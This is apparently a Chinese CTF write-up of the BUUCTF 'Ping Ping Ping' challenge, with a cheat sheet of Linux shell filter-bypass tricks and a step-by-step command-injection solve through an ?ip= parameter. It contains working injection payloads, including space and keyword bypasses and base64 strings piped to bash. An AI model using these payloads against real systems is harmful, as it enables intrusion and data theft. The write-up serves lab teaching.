一道命令执行题目

 

 一、基础知识

【;】作为多个命令语句的分隔符(Command separator [semicolon])。 要在一个语句里面执行多个命令时,可以使用分号分隔。注意,有时候分号需要转义。

【|】管道(pipe)。管道是Linux,Unix都有的概念,是非常基础,也是非常重要的一个概念。它的作用是将管道前(左边)的命令产生的输出(stdout)作为管道后(右边)的命令的输入(stdin)。

【{}】代码块(curly brackets)。 这个是匿名函数,但是又与函数不同,在代码块里面的变量在代码块后面仍能访问。注意:花括号内侧需要有空格与语句分隔。

1)|| 符号 当前一条命令执行结果为false 就执行下一条命令

2)| 符号 只执行 | 符号后面的命令

3)&&符号 当前一条命令执行结果为true 就执行下一条命令

4)&符号 只执行 & 符号后面的命令

5); 符号 不管前一条命令执行的结果是什么,执行下一条命令

6)a=l;b=s;$a$b        //变量覆盖

7)`echo d2hvYW1p | base64 -d `     echo d2hvYW1p | base64 -d | bash          //base64绕过

8)w`saaaddd8450`ho`762aseba2`am`f0j71`i      wh$(caigou)oa$(anquan)mi       666`whoami`666      //反引号加混淆

9)wh$1oami        who$@ami        whoa$*mi       //$1、$@、$*混淆

10)${PATH:5:1}${PATH:2:1}   (执行了ls)  //提取环境变量中的字符执行命令(注意切片是从0开始计数的)对于环境变量字符过少的问题,可以通过export PATH=$PATH:/abcdefg/hijklmn/opq/rst/uvw/xyz/0123456789设置临时环境变量

  • Linux下空格绕过方式

1)cat${IFS}flag.txt
2)cat$IFS$1flag.txt    //此处的数字可以换
3)cat<flag.txt
4)cat<>flag.txt
5){cat,flag.txt}   //在大括号中可用逗号代替空格(前面没有$)

  • Linux下对过滤字符的绕过方式

1)cat fl* //利用*可以任意匹配一个或多个字符
2)cat fl?g //利用?可以任意匹配一个字符
3)echo “Y2F0IGZsYWcucGhw”| base64 -d | bash //base64编码为所要执行的shell命令
4)ca\t fl\ag.php //有待了解
5)cat fl''ag.php
6)a=a;cat${IFS}fl$ag.php //通过变量覆盖绕过字符过滤
7)cat `ls`    //通过命令引用绕过

  • Linux下变量引用

1)$变量名 和 ${变量名}  //当变量名后跟其他字符时,要用大括号括起来或者直接在变量名后加一个$1

  • Linux下命令引用

1)$(命令语句) 和  ` 命令语句`(反引号)

二、解题过程

由提示可知,通过/?ip= 上传控制参数,此题是命令执行漏洞

/?ip=127.0.0.1;ls查看当前目录文件

发现有flag.php和index.php

直接/?ip=127.0.0.1;cat flag.php查看文件

结果发现有过滤,过滤了空格

于是对空格进行绕过/?ip=127.0.0.1;cat${IFS}flag.php

淦,这次是过滤了符号,测试后发现是过滤了大括号{}

于是更换绕过姿势/?ip=127.0.0.1;cat$IFS$1flag.php

又淦,这次把我的flag给过滤了

选择查看另一个文件/?ip=127.0.0.1;cat$IFS$1index.php

有源代码,知晓了过滤情况

使用变量覆盖进行绕过/?ip=127.0.0.1;a=l;cat$IFS$1f$aag.php

没有返回flag但也没有过滤。想到可能是我变量名引发歧义,于是在$a后加了一个$1

/?ip=127.0.0.1;a=l;cat$IFS$1f$a$1ag.php

得到返回结果flag{223ca838-3a28-41df-9821-d65d036099e5}

三、一点思考

此题还可以使用反引号来绕过flag的过滤/?ip=127.0.0.1;cat$IFS$1`ls`

同时我想到可以用通道符来绕过吗

/?ip=127.0.0.1;ls|cat

不行,没有执行cat

在Linux中测试后发现

`ls`执行后的返回结果是用空格分隔的,而ls | 传输的内容是用换行符分隔的。cat 2.txt 3.txt可以执行,但cat 换行符2.txt换行符3.txt不能执行。所以ls | cat不能替换cat `ls`。(仅仅是本人自己的认知)

BUUCTF-[GXYCTF2019]Ping Ping Ping的更多相关文章

  1. 死亡之ping(Ping of Death)

    最简单的基于IP的攻击可能要数著名的死亡之ping,这种攻击主要是由于单个包的长度超过了IP协议规范所规定的包长度.产生这样的包很容易,事实上,许多操作系统都提供了称为ping的网络工具.在为Wind ...

  2. Windows防火墙开启ping,禁ping的配置

    当我通过本机Ping另一台在同一局域网内(即在同一网段)的计算机时,发现,如果防火墙开启的话,无论如何也ping不通.一旦关闭防火墙就可以ping通了.这是为什么呢?究竟该怎么设置呢? 原因是这样的, ...

  3. Windows防火墙开启ping,禁ping的配置方法

    Windows 7,Win 2008 R2,2012 R2: Windows防火墙 --> 高级设置 --> 入站规则 --> 在列表里找到“文件和打印机共享(回显请求 - ICMP ...

  4. 无法上外网, ping网关ping不通的解决——arp命令

    转自:http://jingyan.baidu.com/article/3c48dd34873909e10be35894.html 转自:http://man.linuxde.net/arp 用来管理 ...

  5. Linux Centos7使用ping命令ping不通网络的解决方案

    本解决方案不配置dns,都是ping的IP地址,所以如果想ping域名,则加上DNS项的配置后自行尝试吧 我使用的虚拟机系统信息: Linux:Centos7 Network:虚拟机设置的桥接模式(自 ...

  6. Linux下长时间ping网络加时间戳并记录到文本

    Linux下长时间ping网络加时间戳并记录到文本   由于一些原因,比如需要检查网络之间是否存在掉包等问题,会长时间去ping一个地址,由于会输出大量的信息而且最好要有时间戳,因此我们可以使用简单的 ...

  7. DAY6 使用ping钥匙临时开启SSH:22端口,实现远程安全SSH登录管理就这么简单

    设置防火墙策略时,关于SSH:22访问权限,我们常常会设置服务器只接受某个固定IP(如公司IP)访问,但是当我们出差或在家情况需要登录服务器怎么办呢? 常用两种解决方案:1.通过VPN操作登录主机: ...

  8. 本机,同机房,同城,异地,不同城,腾讯云ping延时值

    本机,同机房,同城,异地,不同城,腾讯云ping延时值 ping本机: 0.01ms ping同机房机器: 0.1ms ping同城机器: 1ms ping不同城机器: 20ms 北(南)方ping南 ...

  9. 使用ping钥匙临时开启SSH:22端口,实现远程安全SSH登录管理就这么简单

    设置防火墙策略时,关于SSH:22访问权限,我们常常会设置服务器只接受某个固定IP(如公司IP)访问,但是当我们出差或在家情况需要登录服务器怎么办呢? 常用两种解决方案:1.通过VPN操作登录主机: ...

  10. 003.同时Ping多个IP(select实现IO复用,信号计时),ping程序升级版

    写这个的目的主要是为了以后的方便: 1.信号计时函数的使用 2.ip头的构建和icmp头的构建 3.selec函数t的用法 代码实现: /src/ping.h /* * ping.h * * Crea ...

随机推荐

  1. 01#Vue Transition 过渡:基于 CSS 过渡

    过渡的阶段 上图是过渡的 6 个阶段示意图.总体是进入和离开两个阶段,进入和离开又各自有两个阶段.下表格是对每一个阶段的解释: 进入和离开实现过渡效果使用的是 CSS 样式,过度的样式相当于重写覆盖了 ...

  2. Android Studio 模拟器(AVD)访问本机服务器

    问题说明 若安卓模拟器(AVD)调试安卓 App,访问本机上的 Tomcat 服务器时,很有可能会不成功,按照下面的步骤来一遍以尝试解决问题. 模拟器配置 DNS 服务器 (一)找到模拟器安装的位置 ...

  3. rn用Modal实现Drawer

    PS:本文仅说明Modal可以用来做Drawer,并不介绍Modal的用法. 今天在开发的时候,想要使用Drawer. RN原生不自带Drawer,react-native-drawer又有bug(没 ...

  4. vue3 、typescript环境, props自定义类型propType

    vue3 .typescript环境, props自定义类型propType //子组件的props类型是复杂的类型的时候,可以用propType进行强制类型转换 //eg 复杂函数,对象数组,对象的 ...

  5. React Navite环境搭建

    俗话说"工欲善其事,必先利其器."所以,我们第一步就是搭建React Native开发坏境. 一.安装Node.js.npm.yarn 1.1 React native需要借助no ...

  6. 狂神--Vue

    概述 前端三要素 HTML(结构) :超文本标记语言(Hyper Text Markup Language) ,决定网页的结构和内容 CSS(表现) :层叠样式表(Cascading Style sh ...

  7. java springboot项目树结构递归查询

    记录工作 本文记录树结构递归查询,像菜单栏和部门 首先需要一张表 CREATE TABLE `sys_dict` ( `id` int NOT NULL AUTO_INCREMENT, `parent ...

  8. 硬件IIC主从机中断代码注释解析

    目录 硬件IIC的主从中断在582的最新EVT中已支持. 对于IIC从机中断,例程中已封装好中断处理过程,用户调用app_i2c时,初始化中需要配置回调函数. 初始化的配置如下. struct i2c ...

  9. 蓝牙mesh组网实践(厂商透传模型介绍)

    目录 CH582的官方EVT中,除了代理节点例程和天猫精灵例程外都提供了厂商定义的透传模型. 模型位于蓝牙mesh网络协议中的最上层,负责标准化用户应用场景的实例,比如说开关模型.亮度模型.风速模型. ...

  10. MapReduce原理——Shuffle机制

    在Map方法之后,Reduce方法之前的数据处理过程称之为Shuffle. Map方法输出的数据会获得对应的分区,进入环形缓冲区(缓冲区一半写索引,另一半写数据).数据达到缓冲区的80%会发生溢写.在 ...